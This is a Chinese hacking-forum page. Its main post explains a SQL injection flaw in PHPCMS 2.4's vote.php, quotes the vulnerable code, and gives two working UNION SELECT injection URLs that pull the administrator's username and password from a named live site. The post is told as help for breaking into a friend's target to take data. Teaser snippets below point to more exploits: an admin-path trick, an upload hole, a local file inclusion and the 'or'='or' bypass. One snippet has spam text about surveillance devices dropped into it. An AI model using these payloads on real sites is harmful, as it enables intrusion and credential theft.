PHPCMS2.4中一个有趣的洞洞
所属分类:
网络安全 / 漏洞分析
阅读数:
144
收藏 0赞 0分享
今天,朋友丢来一个站,说想拿点资料,但搞了很久老搞不下,叫我帮忙看看
打开一看发现是phpcms2.4,很旧的版本了~~
搞了一下发现存在“上传漏洞”和“远程文件包含漏洞”的页面都被删了,晕,自己挖个把,反正版本旧
挖了1个多小时,发现vote.php中有这样一段代码:
...省略....
case 'result':
if(!intval($voteid)){
message('参数错误!',$PHP_REFERER);
}
$query = $db->query("SELECT * FROM $table_vote_subject where voteid='$voteid' and passed=1");
$vote=$db->fetch_array($query);
$subject=$vote[subject];
$totalnumber=$vote[totalnumber];
$fromdate=date("Y-m-d",$vote[fromtime]);
$todate=$vote[totime] ? date("Y-m-d",$vote[totime]) : "";
$query = $db->query("SELECT * FROM $table_vote_option where voteid='$voteid'");
while($op=$db->fetch_array($query)){
$op[percent1]=$totalnumber ? round(100*$op[number]/$vote[totalnumber],2)."%" : "0%";
$op[percent2]=$totalnumber ? (100-round(100*$op[number]/$vote[totalnumber],0))."%" : "100%";
$ops[]=$op;
}
include template('vote_result');
break;
}
....省略....
代码没问题把?真的吗?再仔细看看!!
“if(!intval($voteid))” 这句代码的意思是啥?
如果提交过来的数据是整型并且不存在于数据库中的话,就返回“参数错误”。
那如果我们提交的数据不是整型呢?如果我们提交的数据不是整型,那么不管提交的数据是否存在于数据库中都不会返回“参数错误”的提示了,这样,注入漏洞就产生了~~哈哈
分别提交
“http://www.cndrt.cn/vote.php?action=result&;voteid=8 and 1=2 union select 1,username,3,4,5,6,7,8,9,10,11,12,13 from phpcms_member where userid=1/*””
“http://www.cndrt.cn/vote.php?action=result&;voteid=8 and 1=2 union select 1,password,3,4,5,6,7,8,9,10,11,12,13 from phpcms_member where userid=1/*””
就能查出管理员了
当然你也可以用concat()把账号密码同时抓出来~
织梦管理系统后台查找
有时在通过注射得到织梦程序的管理密码时,却发现找不到后台地址。。 这个时候 大家可以尝试下在地址后面加上:/include/dialog/select_media.php?f=form1.murl 但不一定通杀。。
收藏 0赞 0分享
ckeditor/DesignCms上传漏洞
今天日站发现的.... http://www.xxx.net/manage/Modle/UploadFile/ListFiles.aspx 上传洞洞 上传后没改文件名!可以IIS解析 后面的事,你懂的~ 有点像FCK ... 我晕了...这程式漏洞真多
收藏 0赞 0分享
DedeCmsV5.6 本地包含又一利用方式
续本地包含 include/arc.datalist.class.php $codefile = (isset($needCode) ? $needCode : $cfg_soft_lang); if(file_exists(DEDEINC.'/code/data
收藏 0赞 0分享
Discuz X1.5 用不到 Gmail SSL SMTP
前天 16:50 上传 下载附件 (34.22 KB) ,窃听器哪里有卖
设置如上,车辆跟踪器,登入 username 及 password 都再三确认
但用「检测」就弹出以下错误
前天 16:50 上传 下载附件 (12.73 KB)
请问
收藏 0赞 0分享
万能密码漏洞以及修复
万能密码漏洞以及修复 记得几年前要入侵一个企业网站超级简单 一般只需要找到后台 还有后台通常是www.xxx.com/admin/ 然后账号 密码都是'or'='or' 就进去 现在好像有几个也可以用 但是已经没那么普及了 如果网站还出现这种“
收藏 0赞 0分享
查看更多